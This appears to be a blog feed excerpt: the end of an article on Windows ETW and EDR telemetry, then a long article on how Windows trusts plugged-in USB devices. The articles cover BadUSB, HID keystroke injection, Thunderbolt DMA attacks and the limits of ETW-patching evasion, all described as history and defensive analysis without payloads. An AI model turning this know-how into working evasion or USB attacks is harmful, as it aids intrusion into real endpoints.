Yes, for *publication*. Sysmon's kernel driver `SysmonDrv.sys` registers `PsSetCreateProcessNotifyRoutineEx` and the related thread- and image-load callbacks; the user-mode service then publishes the resulting events via its own `Microsoft-Windows-Sysmon` ETW provider GUID `{5770385F-C22A-43E0-BF4C-06F5698FFBD9}` [@ms-sysmon]. It does not consume the public catalogue providers via ETW for its kernel-event hot path; the kernel taps come straight from the callback API. This callback-then-publish architecture is why Sysmon's events are universally consumable by SIEM forwarders and downstream tools.

Because Defender consumes `Microsoft-Windows-Threat-Intelligence`, which fires from the kernel side of memory-modifying syscalls, not from the user-mode `ntdll!EtwEventWrite` trampoline. The fluxsec.red walkthrough states the asymmetry verbatim: "we cannot patch out the Threat Intelligence provider as this is emitted from within the kernel itself" [@fluxsec-eti]. The Adam Chester 2020 patch silences user-mode providers (like `Microsoft-Windows-DotNETRuntime`) for the patched process; it cannot silence kernel-emitted providers for any process. Defender's load-bearing security signal is structurally out of reach of the user-mode patch class.

No. The provider's security descriptor admits only Antimalware-PPL signers loaded by an ELAM driver. A non-PPL `EnableTraceEx2` call against the EtwTi GUID returns `ERROR_ACCESS_DENIED` (the Microsoft Learn primary on EnableTraceEx2 [@ms-enabletraceex2] documents the error code for insufficient-privilege callers; the PPL-specific gate that triggers it for EtwTi is described in [@fluxsec-eti]). The gate exists because an attacker who could trivially become an EtwTi consumer would have direct visibility into the kernel's view of every memory-modifying syscall on the host -- exactly the inventory needed to evade everything else.

Schema location. Manifest-based providers ship an out-of-band XML manifest registered with `wevtutil im`; consumers decode events against the system-installed manifest using TDH. TraceLogging providers carry the schema *inline* in each event payload as type-length-value triples; consumers decode without any registered manifest. TraceLogging events are larger because the schema bytes ride in the payload; manifest events have a smaller per-event size at the cost of installation friction. Both inherit the eight-session cap [@ms-about-etw], [@ms-tracelogging-about].

Sixty-four globally per [@ms-etw-sessions], with Windows 2000 limited to 32. Per-provider, manifest-based and TraceLogging providers admit up to 8 simultaneous sessions; classic and WPP providers admit only 1 [@ms-about-etw], [@ms-etw-config]. The runtime symptom of the per-provider 8-session cap binding is `ERROR_NO_SYSTEM_RESOURCES` from `EnableTraceEx2` [@ms-enabletraceex2]; the runtime symptom of the global 64-session cap binding is the same error from `StartTrace`.

No. EventPipe is a managed-runtime cross-platform analogue to ETW that shipped in .NET Core 3.0 (September 2019) and remains available in every later release including .NET 5+. It runs on Linux and macOS as well as Windows. On Windows, the kernel-mode providers and the EtwTi security substrate have no EventPipe equivalent; EventPipe is a complement to ETW for managed workloads, not a replacement. The Windows EDR substrate remains ETW; managed-runtime tracing has acquired an additional cross-platform path that does not displace it.
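
The session caps quoted in the answers above can be captured as a small capacity model. This is a sketch of the stated limits only (64 sessions globally, 8 per manifest-based or TraceLogging provider, 1 per classic or WPP provider); it returns booleans and does not try to reproduce the actual error behaviour of `StartTrace` or `EnableTraceEx2`.

```typescript
type ProviderKind = "manifest" | "tracelogging" | "classic" | "wpp";

const GLOBAL_SESSION_CAP = 64;

// Per-provider cap on simultaneous sessions, by provider kind.
function perProviderCap(kind: ProviderKind): number {
  return kind === "manifest" || kind === "tracelogging" ? 8 : 1;
}

// Can one more session be started, given how many are already active?
function canStartSession(activeSessions: number): boolean {
  return activeSessions < GLOBAL_SESSION_CAP;
}

// Can the provider be enabled in one more session, given how many already have it?
function canEnableProvider(kind: ProviderKind, sessionsAlreadyEnabled: number): boolean {
  return sessionsAlreadyEnabled < perProviderCap(kind);
}

console.log("9th consumer of a manifest provider:", canEnableProvider("manifest", 8));
console.log("2nd consumer of a classic provider:", canEnableProvider("classic", 1));
console.log("65th session on the host:", canStartSession(64));
```

The practical reading for a host running several EDR and diagnostic agents: the per-provider cap of 8 usually binds long before the global cap of 64 does.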

ETW is now twenty-six years old. It started as a performance facility for Windows 2000 driver authors who could not afford DbgPrint on production servers, and it became the substrate of every major Windows endpoint security product through a decade of unintended consequences. The Vista team that raised the per-provider session cap from 1 to 8 was thinking about ergonomics. The Windows 8.1 team that introduced Antimalware-PPL was thinking about Defender's hardening, not about future third-party EDRs. The team that shipped EtwTi in the Windows 10 RS-era understood the security stakes precisely. By 2026 those three decisions, taken in three different Microsoft contexts a decade apart, are the architecture of detection on the Windows endpoint -- and the reason the operator in the section 1 hook scene loses the round even when the patch works exactly as it should.

Plug and Trust: How Windows Decides What to Do When You Plug In a USB Device

noreply@paragmali.com (Parag Mali) — Mon, 11 May 2026 00:00:00 GMT

Plugging a USB device into Windows is the single most-trusted action a user routinely performs on an operating system that verifies every byte of code it loads. In a few hundred milliseconds (typically 200-300 ms when the driver is already in the local store; longer on a first-time Windows Update fetch), Windows executes ten or eleven kernel-mode operations (eleven for composite devices) and trusts about 256 bytes of self-described descriptors to decide which driver runs. This article walks that pipeline end-to-end on Windows 11 25H2: the descriptor parser surface, the Plug-and-Play rank algorithm, Kernel-Mode Code Signing and Kernel DMA Protection, BadUSB and Thunderclap, and the five structural limits Windows cannot close without breaking USB compatibility.

1. The Thirty-Second Trust Decision

A user plugs a USB-C thumb drive into a Windows 11 25H2 corporate laptop at 10:42:17 in the morning. Roughly a quarter-second later, the operating system has executed ten or eleven kernel-mode operations (eleven for composite devices) to decide what kind of device it is and which driver to load. None of those eleven operations consulted the user. None of them verified a cryptographic signature from the peripheral. The entire decision rests on roughly 256 bytes of self-described metadata that the device handed the host on insertion.

The "quarter-second" is editorial framing, not a spec-mandated deadline. The only piece USB-IF actually fixes is the 100 ms attach-debounce window T_ATTDB defined in the USB 2.0 specification §7.1.7.3 (Connect and Disconnect Signaling) [@usb-2-0-spec]; the rest of the budget is implementation-dependent. A typical USB 2.0 thumb drive on a 2024-era xHCI controller, with the function driver already in the local store, lands in the 200-300 ms range. A first-time Windows Update fetch, a slow descriptor read, or a multi-configuration device can stretch it to a second or more.

Here is the sequence, in the order Windows executes it:

Port-status-change interrupt fires on the xHCI host controller.
The host controller's driver issues a port reset.
Downstream-port speed detection runs: Low, Full, High, Super, or Super+ Speed.
The hub addresses the device at the default address (zero) and asks for the first eight bytes of the USB_DEVICE_DESCRIPTOR.
SET_ADDRESS assigns a non-default bus address.
The hub fetches the full eighteen-byte device descriptor.
The hub fetches the configuration descriptor, including all interface and endpoint sub-descriptors.
If the descriptor indicates a composite device, the generic parent splits it into per-interface child devices.
The Plug-and-Play manager synthesizes hardware IDs and compatible IDs from the descriptor fields.
The driver-store INF database is searched with a rank-scored matching algorithm; the chosen driver is verified against the Kernel-Mode Code Signing policy.
The class driver attaches to the new device node and begins serving I/O.

Microsoft's own architecture documentation confirms the pipeline: the xHCI host controller driver, the host-controller extension, and the hub driver -- usbhub3.sys, the binary that enumerates devices and creates physical device objects -- are all KMDF-based [@ms-usb-3-0-stack]. The rank-scored INF match comes straight from the Plug-and-Play manager's documented behavior [@ms-pnp-rank]. The signature check is governed by the same Kernel-Mode Code Signing policy that has gated every kernel driver since 64-bit Windows Vista shipped in 2007 [@ms-kmcs].

Key idea: Ten or eleven kernel-mode operations (eleven for composite devices). Zero human decisions. Roughly 256 bytes of self-described metadata. That is the size of the trust gap between physical insertion and the moment a class driver begins reading and writing data inside the Windows kernel.

The load-bearing primitive in that pipeline is the USB descriptor: a small block of bytes the peripheral emits when asked, naming what kind of device it claims to be, who claims to have made it, and what features it claims to support. Windows must trust those bytes to choose a driver. There is no out-of-band channel to verify them. There is no signature on the descriptor itself.

This article is a walk through what Windows does verify, what it cannot verify, and where the gap lives. The trust posture is older than USB itself, and the failure modes are older than Windows 2000. We will start with the inheritance.

2. The Pre-USB Removable-Media Trust Model

A user in Lahore inserts a 5.25-inch floppy into an IBM PC clone. Whatever 512 bytes sit at sector zero of that diskette will execute as part of the operating-system boot path before any code that came with the machine runs. The trust model Windows still uses for USB peripherals in 2026 was already carved into silicon by then.

The IBM PC's boot ROM, by design, copied sector zero of whatever bootable medium was present into memory and jumped to it. That contract -- inserted media is trusted media -- shipped in 1981 and was demonstrated as catastrophic within five years. The Brain virus appeared in 1986 [@wiki-brain]; Stoned in 1987 [@wiki-stoned]; Michelangelo was first discovered on 3 February 1991 in Australia and produced its global panic on March 6, 1992 [@wiki-michelangelo]. Each one used the boot-sector primitive that Wikipedia's standard reference on boot sectors documents [@wiki-bootsector]. The Brain virus shipped with a literal copyright notice in the boot sector, naming the Alvi brothers and giving an address in Lahore: a piece of self-documenting malware authored when virus authors did not yet expect to be prosecuted. The address-and-phone-number pattern is a recurring forensic curiosity from the 1986-1990 era.

A USB descriptor is a small, structured block of bytes that a USB peripheral returns when the host asks for it. There are five standard descriptor types in the USB 1.0 specification (device, configuration, string, interface, endpoint) and several class-specific descriptors (HID report descriptors, audio control units, mass-storage CSW formats) layered on top. The device descriptor names a vendor ID, a product ID, a device class, and the maximum packet size for the default control pipe. The string descriptors carry the human-readable manufacturer, product, and serial-number text that Windows displays in Device Manager and that Defender for Endpoint per-serial allow-lists key on. The host has no out-of-band channel to verify any of these fields; the peripheral's self-declaration *is* its identity for the purpose of driver selection.
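To make the device descriptor concrete, here is a minimal Python sketch that unpacks the eighteen-byte block into its named fields. The field names follow the USB specification's standard device descriptor layout; the sample bytes (VID 0x1234, PID 0x5678) are hypothetical, and nothing here reflects how usbhub3.sys is actually written. Every value the function returns is whatever the peripheral chose to send.

```python
import struct
from typing import NamedTuple


class DeviceDescriptor(NamedTuple):
    bLength: int
    bDescriptorType: int
    bcdUSB: int
    bDeviceClass: int
    bDeviceSubClass: int
    bDeviceProtocol: int
    bMaxPacketSize0: int
    idVendor: int
    idProduct: int
    bcdDevice: int
    iManufacturer: int
    iProduct: int
    iSerialNumber: int
    bNumConfigurations: int


# Little-endian, no padding: 1+1+2+1+1+1+1+2+2+2+1+1+1+1 = 18 bytes.
_DEVICE_FORMAT = "<BBHBBBBHHHBBBB"
DESC_TYPE_DEVICE = 0x01


def parse_device_descriptor(raw: bytes) -> DeviceDescriptor:
    """Unpack an 18-byte device descriptor, rejecting obviously malformed input."""
    if len(raw) != struct.calcsize(_DEVICE_FORMAT):
        raise ValueError("device descriptor must be exactly 18 bytes")
    desc = DeviceDescriptor(*struct.unpack(_DEVICE_FORMAT, raw))
    if desc.bLength != 18 or desc.bDescriptorType != DESC_TYPE_DEVICE:
        raise ValueError("bLength/bDescriptorType do not describe a device descriptor")
    return desc


# Hypothetical sample: USB 2.0, class defined per interface, 64-byte control pipe.
SAMPLE = bytes.fromhex("12 01 00 02 00 00 00 40 34 12 78 56 00 01 01 02 03 01")
descriptor = parse_device_descriptor(SAMPLE)
print(f"VID={descriptor.idVendor:04X} PID={descriptor.idProduct:04X}")
```

The length and type checks are the only validation possible at this layer. There is no field the host can use to confirm that the vendor ID belongs to the party that built the device.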

Microsoft inherited the contract from DOS and refined it. AutoRun, which the Wikipedia reference documents verbatim, "was introduced in Windows 95 to ease application installation for non-technical users and reduce the cost of software support calls ... a feature of Windows Explorer (actually of the shell32 dll) ... enables media and devices to launch programs by use of command listed in a file called autorun.inf, stored in the root directory of the medium" [@wiki-autorun]. Windows 95 reached retail on August 24, 1995. The original design intent was CD-ROM application installation -- read-only optical media, written once at the factory, shipped in a sealed jewel case. The trust assumption matched the physical reality.

Four months after Windows 95 shipped, the USB Implementers Forum was formed. Wikipedia preserves the date and the founder list verbatim: "The USB-IF was initiated on December 5, 1995, by the group of companies that was developing USB ... Compaq, Digital Equipment Corporation, IBM, Intel, Microsoft, NEC and Nortel" [@wiki-usbif]. Microsoft was a co-author of the contract that would govern peripheral trust on every Windows machine for the next thirty years.

A Vendor ID is a 16-bit number that the USB Implementers Forum sells to a device manufacturer for a one-time \$6,000 fee [@wiki-usbif]. A Product ID is a 16-bit number the manufacturer assigns to a specific product within their VID space. The pair forms the most-specific hardware ID Windows uses to select a USB driver, in the form `USB\VID_xxxx&PID_xxxx`. The USB-IF Vendor-ID fee is the only economic gate between an arbitrary firmware author and a "trusted" identity in Windows's driver-store search; it is not a cryptographic gate of any kind.
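The identifier strings built from those numbers can be sketched in a few lines of Python. The `USB\VID_xxxx&PID_xxxx` form comes from the text above; the `&REV_` variant and the class-based compatible-ID forms are assumptions based on Microsoft's published standard USB identifier formats, and the function names are hypothetical. This is an illustration of the string shapes, not the Plug-and-Play manager's implementation.

```python
from typing import List


def _check_range(name: str, value: int, limit: int) -> None:
    if not 0 <= value <= limit:
        raise ValueError(f"{name} out of range: {value!r}")


def usb_hardware_ids(vid: int, pid: int, rev: int) -> List[str]:
    """Most-specific first: VID+PID+REV, then VID+PID (single-interface device)."""
    for name, value in (("vid", vid), ("pid", pid), ("rev", rev)):
        _check_range(name, value, 0xFFFF)
    return [
        f"USB\\VID_{vid:04X}&PID_{pid:04X}&REV_{rev:04X}",
        f"USB\\VID_{vid:04X}&PID_{pid:04X}",
    ]


def usb_compatible_ids(cls: int, subclass: int, protocol: int) -> List[str]:
    """Class-based fallbacks, again ordered from most to least specific."""
    for name, value in (("cls", cls), ("subclass", subclass), ("protocol", protocol)):
        _check_range(name, value, 0xFF)
    return [
        f"USB\\Class_{cls:02X}&SubClass_{subclass:02X}&Prot_{protocol:02X}",
        f"USB\\Class_{cls:02X}&SubClass_{subclass:02X}",
        f"USB\\Class_{cls:02X}",
    ]


# Hypothetical device: VID 0x1234, PID 0x5678, revision 1.00, HID boot keyboard.
for identifier in usb_hardware_ids(0x1234, 0x5678, 0x0100) + usb_compatible_ids(0x03, 0x01, 0x01):
    print(identifier)
```

Every input to both functions is read from the device's own descriptors, which is why the fee described above is an economic gate and not a cryptographic one.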

The first complete USB specification followed quickly. Wikipedia's USB article puts it verbatim: "Designed January 1996 ... Produced Since May 1996 ... Designer: Compaq, DEC, IBM, Intel, Microsoft, NEC, Nortel" [@wiki-usb]. USB 1.0 defined the five standard descriptors, the bus enumeration handshake, and -- the load-bearing architectural choice -- the device-class architecture in which the peripheral declares its own class, subclass, and protocol. A USB keyboard reports bInterfaceClass=0x03 (HID) because it says it is a keyboard. The host has no other source of that fact.

Three years later, the protocol's storage cousin arrived. The USB Mass Storage Class Bulk-Only Transport, Revision 1.0, was published in September 1999 [@usb-massbulk-pdf]. That specification is the protocol on which Windows 2000's usbstor.sys and every modern thumb-drive driver are built. It defines a stripped-down SCSI command set tunneled over USB bulk endpoints; it does not define any peripheral-authentication mechanism.

The inheritance is structural. AutoRun shipped in 1995, designed for write-once optical media in a sealed jewel case. Windows 2000 extended AutoRun to every mounted volume -- including the new USB thumb-drive class. A 1995 trust model built for trusted physical media now governed read-write USB sticks anyone could carry between machines. Forty years later, that line in the lineage has not been redrawn.

timeline
    title Pre-USB removable-media trust, 1981 to 2000
    1981 : IBM PC ships : Boot ROM jumps to sector 0 of inserted media
    1986 : Brain virus : Lahore : First in-the-wild boot-sector virus
    1987 : Stoned virus : Boot-sector class established
    1991 : Michelangelo discovered : 3 February 1991, Australia
    1992 : Michelangelo media panic : Trigger date 6 March 1992
    1995 : Windows 95 RTM : AutoRun introduced for CD-ROM installers
    1995 : USB-IF founded December 5 : Seven-company consortium
    1996 : USB 1.0 designed January : Device-class architecture: peripheral declares its own class
    1999 : USB Mass Storage 1.0 : Bulk-Only Transport specification
    2000 : Windows 2000 usbstor.sys : AutoRun extends to USB volumes

Timeline sources, in row order: [@wiki-bootsector] for the IBM PC boot-sector contract; [@wiki-brain], [@wiki-stoned], and [@wiki-michelangelo] for the named-virus lineage and the 1992-not-1991 Michelangelo panic date; [@wiki-autorun] for the Windows 95 / AutoRun introduction; [@wiki-usbif] for the USB-IF founding date and seven-company consortium; [@wiki-usb] for the USB 1.0 January 1996 design date and the device-class architecture; [@usb-massbulk-pdf] for the USB Mass Storage Class Bulk-Only Transport 1.0 specification.

If the trust model is forty years old, the failure modes must be older than USB. They are. The first fifteen years of USB on Windows were a transport in search of a security model, and the bill came due in two famous worms.

3. The Pre-Hardening Era, 1996 to 2010

For its first fifteen years on Windows, USB was a transport in search of a security model. Drivers were unsigned on 32-bit. AutoRun was on. Descriptors were trusted. The bill was paid in two worms.

The Generation-1 stack was a USB 1.1 design retrofitted onto Windows 95 OSR2.1 in 1997 and refined for Windows 2000. The host-controller drivers (Usbuhci.sys, Usbohci.sys, and later Usbehci.sys for USB 2.0 high speed) sat below a single port driver, Usbport.sys; the hub driver was usbhub.sys. Microsoft's USB-3.0 architecture page documents the older 2.0 stack as the predecessor of the modern KMDF chain [@ms-usb-3-0-stack]. On 32-bit Windows, none of these binaries needed a Microsoft-trusted signature to load.

Windows 2000 added usbstor.sys, the function driver implementing the USB Mass Storage Class Bulk-Only protocol [@usb-massbulk-pdf]. Suddenly a thumb drive was a first-class read-write filesystem the user could carry between machines, and AutoRun -- a 1995 contract for CD-ROM application installers -- applied to it. The original autorun.inf was a sensible primitive. Insert a sealed jewel case, run the vendor's setup wizard, get a new application. Extending the contract to user-writable USB sticks broke the cardinal assumption: that the media's content was set by a trustworthy party at the factory and could not be modified in the field.

KMCS is the Windows policy that requires every kernel-mode binary -- every `.sys` file Windows loads into ring zero -- to carry a digital signature chaining to a Microsoft-trusted root certificate. KMCS has been mandatory on 64-bit Windows since Vista shipped in 2007. Microsoft Learn documents the signing-by-version matrix, the SHA-256 algorithm requirement, and the post-2016 narrowing of the cross-signed-CA exception. KMCS prevents an attacker from loading an arbitrary `.sys` file into the kernel. It does not, by itself, prevent an attacker from feeding malicious *data* to an already-signed `.sys` file.

The Conficker worm, first detected in November 2008, industrialized the AutoRun-on-USB era. Wikipedia summarizes its origin verbatim: "first detected in November 2008 ... uses flaws in Windows OS software (MS08-067 / CVE-2008-4250) and dictionary attacks on administrator passwords to propagate ... The first variant of Conficker, discovered in early November 2008, propagated through the Internet by exploiting a vulnerability in a network service (MS08-067)" [@wiki-conficker]. Conficker rode two completely separate vectors: a Server Service vulnerability (a path-canonicalization overflow in srvsvc.dll reachable over SMB on TCP 445 and via NetBIOS over TCP/IP on TCP 139) over the network [@nvd-cve-2008-4250], and autorun.inf-driven AutoPlay execution on inserted USB drives. The two propagation paths are independent and worth distinguishing.

Note: MS08-067 / CVE-2008-4250 is the Server Service RPC-over-SMB vulnerability (reachable on TCP 445 and via NetBIOS over TCP/IP on TCP 139) that gave Conficker its network propagation. NIST's NVD entry characterises the surface verbatim as "a crafted RPC request that triggers the overflow during path canonicalization, as exploited in the wild by Gimmiv.A in October 2008, aka 'Server Service Vulnerability'" [@nvd-cve-2008-4250]. The USB-side propagation came from autorun.inf on inserted thumb drives, not from MS08-067. The two vectors share a worm but not a vulnerability. Press accounts that conflate them tend to overstate what closing MS08-067 actually did to USB-borne malware in 2008.

Stuxnet followed in 2010. Wikipedia's article puts the timing and the vector verbatim: "Stuxnet is a malicious computer worm first uncovered on 17 June 2010 ... It is typically introduced to the target environment via an infected USB flash drive, thus crossing any air gap" [@wiki-stuxnet]. The technical primitive that let Stuxnet cross air gaps onto Iranian centrifuge-control PCs was CVE-2010-2568, a flaw in the Windows Shell's processing of .LNK shortcut icons. NIST's National Vulnerability Database entry preserves the verbatim characterization: "Windows Shell in Microsoft Windows XP SP3, Server 2003 SP2, Vista SP1 and SP2, Server 2008 SP2 and R2, and Windows 7 allows local users or remote attackers to execute arbitrary code via a crafted (1) .LNK or (2) .PIF shortcut file, which is not properly handled during icon display in Windows Explorer, as demonstrated in the wild in July 2010, and originally reported for malware that leverages CVE-2010-2772 in Siemens WinCC SCADA systems" [@nvd-cve-2010-2568]. Microsoft Security Bulletin MS10-046 shipped the patch [@ms10-046].

Windows Shell in Microsoft Windows XP SP3, Server 2003 SP2, Vista SP1 and SP2, Server 2008 SP2 and R2, and Windows 7 allows local users or remote attackers to execute arbitrary code via a crafted (1) .LNK or (2) .PIF shortcut file, which is not properly handled during icon display in Windows Explorer, as demonstrated in the wild in July 2010. -- NIST, National Vulnerability Database, CVE-2010-2568 [@nvd-cve-2010-2568]

Patch Tuesday in February 2011 closed the AutoRun pipeline on Windows versions older than Windows 7. Brian Krebs covered the rollout verbatim at the time: "Microsoft also issued an update that changes the default behavior in Windows when users insert a removable storage device, such as a USB or thumb drive. This update effectively disables 'autorun,' a feature of Windows that has been a major vector for malware over the years. Microsoft released this same update in February 2009, but it offered it as an optional patch. The only thing different about the update this time is that it is being offered automatically to users who patch through Windows Update or Automatic Update" [@krebs-feb2011]. The update originally shipped as an optional Windows-7-era fix; Microsoft made it automatic for XP, Vista, Server 2003, and Server 2008 in February 2011.

Six months later, the descriptor-parser surface itself was named for the first time. Andy Davis of NCC Group gave "USB -- Undermining Security Barriers" at Black Hat USA 2011. The verified NCC Group publication archive carries the talk and a one-line abstract [@ncc-davis-2011]. Davis fuzzed USB descriptors against the Windows kernel parser and demonstrated that the parser itself -- not the application layer, not AutoRun -- was kernel-mode adversarial-input attack surface. The talk did not name a single bug; it named a class of bugs: anything that parses adversarial bytes in ring zero in a memory-unsafe language.

Why did none of these fixes survive structurally? Each was a single-bug closure. Disabling AutoRun did nothing about HID injection. Patching the LNK parser did nothing about the descriptor-parser surface. Signing kernel binaries did not change what those binaries trusted at runtime. Each fix shrank one bug class by one. The premise -- that a USB peripheral's self-declaration is its identity -- was untouched.

The post-2010 hardening of USB on Windows would change the surfaces around the descriptor parser. None of it would change the descriptor parser's contract.

4. Generation by Generation: Ten Acts of Hardening

The post-2010 hardening of USB on Windows is a ten-act story: signing, lockdown, watershed, silicon, policy. Each act addressed one premise, and exactly one premise, of the trust failure that came before it. None of them changed the foundational contract.

Generation 2 -- Vista x64 Kernel-Mode Code Signing (2007). Every USB function and class driver had to chain to a Microsoft-trusted root and use SHA-2 once 64-bit Vista landed. Microsoft Learn carries the signing-by-version matrix and the cross-signed-CA carve-out verbatim, including the post-2015 narrowing in which "Cross-signed drivers are still permitted if ... The PC was upgraded from an earlier release of Windows to Windows 10, version 1607 ... Drivers was signed with an end-entity certificate issued prior to July 29th 2015 that chains to a supported cross-signed CA" [@ms-kmcs]. Companion documentation describes the broader driver-signing pipeline [@ms-drvsigning]. For the full reinvention of code-identity verification on Windows, the sibling article on Windows app identity is the canonical reference [@paragmali-appid].

Generation 3 -- AutoRun and LNK lockdown (2009-2011). Already covered in Section 3. KB971029 and MS10-046, taken together, closed the autorun.inf-driven AutoPlay vector and the LNK-icon parsing flaw used by Stuxnet [@krebs-feb2011] [@nvd-cve-2010-2568].

Generation 4 -- The descriptor-parser surface and the USB 3.0 stack (2011-2012). Andy Davis named the surface at Black Hat 2011 [@ncc-davis-2011]. Windows 8 in 2012 shipped a new USB 3.0 stack written from scratch on Microsoft's Kernel-Mode Driver Framework. The architectural reference confirms the rebuild verbatim: "Microsoft created the USB 3.0 drivers by using Kernel Mode Driver Framework (KMDF) interfaces ... Usbhub3.sys ... Manages USB hubs and their ports ... Enumerates devices and other hubs ... Creates physical device objects (PDOs)" [@ms-usb-3-0-stack]. The new stack changed the codebase the descriptor parser ran in. It did not change the contract the descriptor parser had to honor.

The Human Interface Device class is a USB device-class specification originally designed for keyboards, mice, joysticks, and similar input devices. A USB device declares itself HID by setting `bInterfaceClass=0x03` in its interface descriptor. Once Windows accepts that declaration, the device is allowed to inject keyboard and pointer events into the active session as if a human were operating a physical keyboard. The HID class has no provision for authenticating that the device is, in fact, a keyboard rather than a reprogrammed thumb drive emulating one; the class definition is itself the attack surface.

Generation 5 -- BadUSB watershed (Black Hat USA 2014). Karsten Nohl, Sascha Krißler, and Jakob Lell of SR Labs presented BadUSB -- On Accessories That Turn Evil [@nohl-wiki]. The SR Labs slide deck's title page is preserved verbatim, with all three authors named, on a mirrored PDF [@srlabs-badusb-pdf]; Wikipedia's BadUSB article also preserves the three-author attribution and the underlying primitive: "USB flash drives can contain a programmable Intel 8051 microcontroller" [@wiki-badusb]. Wired's contemporaneous press coverage credited only Nohl and Lell; Krißler's name was dropped in the popular write-up. The SR Labs slide deck and the Wikipedia article both preserve the full three-author attribution. Press attributions of conference talks routinely shed authors; the slide-deck title page is the durable source. Two months after Black Hat, Adam Caudill and Brandon Wilson released the Psychson toolchain at DerbyCon 2014, demonstrating end-to-end reflash of the Phison PS2251-03 controller. The repository README confirms the lineage verbatim: "this is 8051 custom firmware written in C ... firmware patches have only been tested against PS2251-03 firmware version 1.03.53 ... DriveCom ... EmbedPayload ... Injector ... Huge thanks to the Hak5 team for their work on the excellent USB Rubber Ducky" [@psychson-repo]. Wired's October 2014 follow-up carries Caudill's verbatim release rationale from the DerbyCon stage: "The belief we have is that all of this should be public. It shouldn't be held back. So we're releasing everything we've got" [@wired-2014-10]. The same article quotes Nohl's verbatim architectural verdict on the underlying protocol: "to prevent USB devices' firmware from being rewritten, their security architecture would need to be fundamentally redesigned ... it could take 10 years or more to iron out the USB standard's bugs and pull existing vulnerable devices out of circulation" [@wired-2014-10].

It could take 10 years or more to iron out the USB standard's bugs and pull existing vulnerable devices out of circulation. -- Karsten Nohl, SR Labs, quoted in Wired, October 2014 [@wired-2014-10]

Generation 6 -- HID-as-weapon era (2010-present). The Hak5 USB Rubber Ducky -- introduced in 2010 by Hak5 founder Darren Kitchen, who pioneered the keystroke-injection technique [@hak5-ducky-docs] -- commercialized the HID-injection primitive four years before BadUSB was disclosed. The Mark II hardware is still sold today [@hak5-shop-ducky], and DuckyScript v1 (2011) and v3 (2022) are documented end-to-end on the Hak5 documentation portal [@hak5-ducky-docs]. The commercial HID-injection device predates the academic disclosure by four years. By the time BadUSB hit Black Hat in August 2014, Hak5 had already been selling a packaged keystroke-injection thumb drive at consumer prices for four years. "BadUSB" academicized what penetration testers were already shipping in mailers. The O.MG Cable, released by Mischief Gadgets, embedded the implant inside a USB-A-to-Lightning charging cable form factor and put a WiFi beacon inside it. The product page states the design intent verbatim: "O.MG Cables are hand made USB cables with an advance WiFi implant inside. Designed to allow Red Teams to emulate sophisticated attack scenarios previously only capable with $20,000 cables" [@omg-cable]. The FBI's March 2020 FLASH alert -- reported by BleepingComputer at the time -- confirmed organized cybercriminal actors mailing the same primitive: "Hackers from the FIN7 cybercriminal group have been targeting various businesses with malicious USB devices acting as a keyboard when plugged into a computer ... These USB drives are configured to emulate keystrokes that launch a PowerShell command to retrieve malware from server controlled by the attacker" [@bleeping-fin7]. The FBI repeated the warning with a follow-on FLASH alert in January 2022 that extended the targeting to transportation, insurance, and defense companies [@wiki-badusb].

Generation 7 -- Thunderbolt DMA and Thunderclap (NDSS 2019), Thunderspy (2020). Theodore Markettos, Colin Rothwell, Brett Gutstein, Allison Pearce, Peter Neumann, Simon Moore, and Robert Watson of Cambridge, Rice, and SRI demonstrated peripheral DMA attacks against IOMMU-on platforms by exploiting shared IOMMU contexts. Their NDSS 2019 paper concludes verbatim: "Windows only uses the IOMMU in limited cases and remains vulnerable" [@ndss-thunderclap]. One year later, Björn Ruytenberg of Eindhoven University of Technology released Thunderspy, a family of seven vulnerabilities extending the attack surface to firmware-reflash of the Thunderbolt controller itself: "All the attacker needs is 5 minutes alone with the computer, a screwdriver, and some easily portable hardware" [@thunderspy]. Wikipedia preserves the May 10, 2020 disclosure date [@thunderspy-wiki].

Generation 8 -- Kernel DMA Protection (Windows 10 1803, April 2018). This is the first Windows USB-adjacent defense that targeted trust below the descriptor parser rather than the parser itself. Microsoft Learn names the primitive verbatim: "Windows uses the system Input/Output Memory Management Unit (IOMMU) to block external peripherals from starting and performing DMA, unless the drivers for these peripherals support memory isolation (such as DMA-remapping) ... By default, peripherals with DMA Remapping incompatible drivers are blocked from starting and performing DMA until an authorized user signs into the system or unlocks the screen" [@ms-kdp]. Per-driver opt-in is documented separately [@ms-dmaremap]. The same Microsoft Learn page is explicit about what KDP does not defend: "Kernel DMA Protection feature doesn't protect against DMA attacks via 1394/FireWire, PCMCIA, CardBus, or ExpressCard". A USB 2.0 thumb drive performs no DMA at all; KDP is silent on it.

Kernel DMA Protection is the Windows defense that uses the platform's IOMMU (Intel VT-d, AMD-Vi, or an ARM equivalent) to confine externally connected PCIe-class peripherals to device-private memory windows. With KDP armed, a Thunderbolt or USB4 peripheral cannot read arbitrary kernel memory by issuing DMA requests, even if its driver is malicious or buggy. KDP is opt-in at three levels: silicon (the platform must have an IOMMU), firmware (the UEFI must publish DMAR / IVRS tables), and driver (the driver must declare `DmaRemappingCompatible=1` in its INF). KDP does not protect against attacks delivered through descriptor parsing, HID injection, or mass-storage exfiltration.

Generation 9 -- USB Type-C UCM stack (Windows 10 1607, 2016). The USB Connector Manager class extension family -- UcmCx.sys, UcmUcsiCx.sys, UcmTcpciCx.sys -- brought Power Delivery, Alternate Mode (DisplayPort, Thunderbolt, USB4), and bidirectional power-role negotiation into the Windows driver model. Microsoft Learn names the architecture verbatim: "UCM is designed by using the WDF class extension-client driver model" [@ms-typec].

Generation 10 -- Defender, ASR, and Device Control unification (2018-2024). The Attack Surface Reduction rule set, documented in Microsoft's ASR-rule-to-GUID matrix [@ms-asr-rules], includes the rule "Block untrusted and unsigned processes that run from USB", identified by GUID b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4. Microsoft Defender for Endpoint Device Control followed, generally available in 2024, with per-VID/PID, per-serial-number, per-operation, and per-user policy primitives [@ms-devcontrol]. Together with the older Group Policy Device Installation Restrictions framework [@ms-gpo-devinstall] and the system-defined Device Setup Class GUIDs [@ms-devsetupclasses], these form the deployable enterprise triangle around the BadUSB / HID-injection problem.

timeline
    title Ten generations of Windows USB hardening
    1996 : Gen 1 : Original USB stack ships ; unsigned 32-bit drivers
    2007 : Gen 2 : KMCS on Vista x64 ; mandatory signed kernel binaries
    2009-2011 : Gen 3 : AutoRun and LNK lockdown ; KB971029 and MS10-046
    2011 : Gen 4 : Andy Davis names the descriptor parser surface
    2012 : Gen 4 cont. : USB 3.0 KMDF stack ships in Windows 8
    2014 : Gen 5 : BadUSB watershed ; SR Labs at Black Hat
    2010-2024 : Gen 6 : HID-as-weapon era ; Rubber Ducky to O.MG Cable
